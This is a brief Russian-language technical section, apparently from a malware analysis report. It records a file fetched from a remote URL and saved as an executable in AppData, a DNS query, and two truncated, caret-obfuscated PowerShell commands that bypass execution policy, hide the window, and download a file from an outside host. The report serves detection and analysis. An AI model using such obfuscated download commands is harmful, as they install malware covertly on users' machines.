Техническая информация
- http://randoz-pandom.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwersHEll^.^ExE ^-^E^XEC^u^t^ion^PO^l^iCY ^B^Y^Pass -^N^O^p^rofiLE^ ^-w^inDOWS^Ty^Le^ ^Hi^dD^en ^(^Ne^w-obJ^e^Ct s^ysTEM.N^et.^w^E^bC^L^iENT).D^o^WnlOADFIlE^('http://rando...
- DNS ASK ra####-pandom.wang
- '<SYSTEM32>\cmd.exe' /C "pOwersHEll^.^ExE ^-^E^XEC^u^t^ion^PO^l^iCY ^B^Y^Pass -^N^O^p^rofiLE^ ^-w^inDOWS^Ty^Le^ ^Hi^dD^en ^(^Ne^w-obJ^e^Ct s^ysTEM.N^et.^w^E^bC^L^iENT).D^o^WnlOADFIlE^('http://rando...' (со скрытым окном)